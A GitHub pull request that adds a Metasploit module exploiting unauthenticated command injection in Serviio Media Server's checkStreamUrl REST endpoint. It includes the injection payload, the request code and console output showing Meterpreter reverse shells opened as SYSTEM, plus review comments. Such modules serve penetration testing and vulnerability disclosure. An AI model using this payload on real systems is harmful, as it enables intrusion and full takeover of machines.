Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Serviio Media Server checkStreamUrl Command Execution #8347

Merged
merged 4 commits into from May 16, 2017

Conversation

bcoles
Copy link
Contributor

@bcoles bcoles commented May 5, 2017

This PR adds an exploit module for Serviio Media Server.

This module exploits an unauthenticated remote command execution vulnerability
in the console component of Serviio Media Server versions 1.4 to 1.8 on
Windows operating systems.

The console service (on port 23423 by default) exposes a REST API which
which does not require authentication.

The 'action' API endpoint does not sufficiently sanitize user-supplied data
in the 'VIDEO' parameter of the 'checkStreamUrl' method. This parameter is
used in a call to cmd.exe resulting in execution of arbitrary commands.

This module has been tested successfully on Serviio Media Server versions
1.4.0, 1.5.0, 1.6.0 and 1.8.0 on Windows 7.

Documentation

To follow; when I feel like it.

Verification

  • Start msfconsole
  • use exploit/windows/http/serviio_checkstreamurl_cmd_exec
  • check
  • Verify the check method returns Unknown if the connection to the target server fails.
  • Verify the check method returns Appears if the target server is Serviio version 1.4 to 1.8 on Windows.
  • Verify the check method returns Safe if the target server is not Serviio version 1.4 to 1.8 on Windows.
  • run
  • Verify you get a shell.

Output

msf > use exploit/windows/http/serviio_checkstreamurl_cmd_exec 
msf exploit(serviio_checkstreamurl_cmd_exec) > set rhost 172.16.191.166
rhost => 172.16.191.166
msf exploit(serviio_checkstreamurl_cmd_exec) > check
[*] 172.16.191.166:23423 The target appears to be vulnerable.
msf exploit(serviio_checkstreamurl_cmd_exec) > set verbose true
verbose => true
msf exploit(serviio_checkstreamurl_cmd_exec) > check

[*] 172.16.191.166:23423 Serviio Media Server version 1.8
[*] 172.16.191.166:23423 The target appears to be vulnerable.
msf exploit(serviio_checkstreamurl_cmd_exec) > run

[*] Started reverse TCP handler on 172.16.191.181:4444 
[*] Serviio Media Server version 1.8
[*] Command Stager progress -   7.95% done (7999/100636 bytes)
[*] Command Stager progress -  15.90% done (15998/100636 bytes)
[*] Command Stager progress -  23.85% done (23997/100636 bytes)
[*] Command Stager progress -  31.79% done (31996/100636 bytes)
[*] Command Stager progress -  39.74% done (39995/100636 bytes)
[*] Command Stager progress -  47.69% done (47994/100636 bytes)
[*] Command Stager progress -  55.64% done (55993/100636 bytes)
[*] Command Stager progress -  63.59% done (63992/100636 bytes)
[*] Command Stager progress -  71.54% done (71991/100636 bytes)
[*] Command Stager progress -  79.48% done (79990/100636 bytes)
[*] Command Stager progress -  87.43% done (87989/100636 bytes)
[*] Command Stager progress -  95.38% done (95988/100636 bytes)
[*] Sending stage (957487 bytes) to 172.16.191.166
[*] Command Stager progress - 100.00% done (100636/100636 bytes)
[*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.166:58474) at 2017-05-05 02:49:39 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd 
C:\Program Files\Serviio\bin

def execute_command(cmd, opts = {})
json = { 'name' => 'checkStreamUrl',
'parameter' => ['VIDEO', "\" &#{cmd}&"] }.to_json

Copy link
Contributor

@mdisec mdisec May 8, 2017

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Formatting suggestions.

    json = {
      'name'      => 'checkStreamUrl',
      'parameter' => ['VIDEO', "\" &#{cmd}&"]
    }.to_json

Copy link
Contributor Author

@bcoles bcoles May 8, 2017

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

No thanks

Copy link
Contributor Author

@bcoles bcoles May 10, 2017

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Symmetrical style hash brace layout as per Rubocop MultilineHashBraceLayout in lieu of a Metasploit style guide.

However the .to_json call should probably be moved inside the send_request_uri method. I've fixed this.

'method' => 'POST',
'ctype' => 'application/json',
'data' => json)
end
Copy link
Contributor

@mdisec mdisec May 8, 2017

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Yet another formatting suggestion.

send_request_cgi(
  'uri'    => normalize_uri(target_uri.path, 'rest', 'action'),
  'method' => 'POST',
  'ctype'  => 'application/json',
  'data'   => json
)

Copy link
Contributor Author

@bcoles bcoles May 8, 2017

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

No thanks

Copy link
Contributor Author

@bcoles bcoles May 10, 2017

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Symmetrical style method call brace layout as per Rubocop MultilineMethodCallBraceLayout in lieu of a Metasploit style guide.

end

def exploit
fail_with(Failure::NoTarget, 'Target is not vulnerable') unless check == CheckCode::Appears
Copy link
Contributor

@mdisec mdisec May 8, 2017

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I believe you may want to use Failure::NotVulnerable instead of Failure::NoTarget.

Copy link
Contributor Author

@bcoles bcoles May 8, 2017

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Fixed

@wchen-r7 wchen-r7 self-assigned this May 16, 2017
@wchen-r7
Copy link
Contributor

@wchen-r7 wchen-r7 commented May 16, 2017

Testing...

@wchen-r7
Copy link
Contributor

@wchen-r7 wchen-r7 commented May 16, 2017

Flawless victory:

msf exploit(serviio_checkstreamurl_cmd_exec) > check
[*] 192.168.146.171:23423 The target appears to be vulnerable.
msf exploit(serviio_checkstreamurl_cmd_exec) > run

[*] Started reverse TCP handler on 192.168.146.1:4444 
[*] Command Stager progress -   7.95% done (7999/100636 bytes)
[*] Command Stager progress -  15.90% done (15998/100636 bytes)
[*] Command Stager progress -  23.85% done (23997/100636 bytes)
[*] Command Stager progress -  31.79% done (31996/100636 bytes)
[*] Command Stager progress -  39.74% done (39995/100636 bytes)
[*] Command Stager progress -  47.69% done (47994/100636 bytes)
[*] Command Stager progress -  55.64% done (55993/100636 bytes)
[*] Command Stager progress -  63.59% done (63992/100636 bytes)
[*] Command Stager progress -  71.54% done (71991/100636 bytes)
[*] Command Stager progress -  79.48% done (79990/100636 bytes)
[*] Command Stager progress -  87.43% done (87989/100636 bytes)
[*] Command Stager progress -  95.38% done (95988/100636 bytes)
[*] Sending stage (957487 bytes) to 192.168.146.171
[*] Command Stager progress - 100.00% done (100636/100636 bytes)
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.171:49186) at 2017-05-16 16:17:37 -0500

meterpreter > 

@wchen-r7 wchen-r7 merged commit 42c7d64 into rapid7:master May 16, 2017
1 check passed
@wchen-r7
Copy link
Contributor

@wchen-r7 wchen-r7 commented May 16, 2017

Release Notes

The exploits/windows/http/serviio_checkstreamurl_cmd_exec module has been added to the framework. It exploits a vulnerability in Serviio Media Server. Serviio is a free media server that allows you stream video, audio, and images. The console service in Serviio exposes a REST API that allows a remote user to execute system commands, which can be abused to gain arbitrary remote code execution under the context of SYSTEM (on Windows).

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

5 participants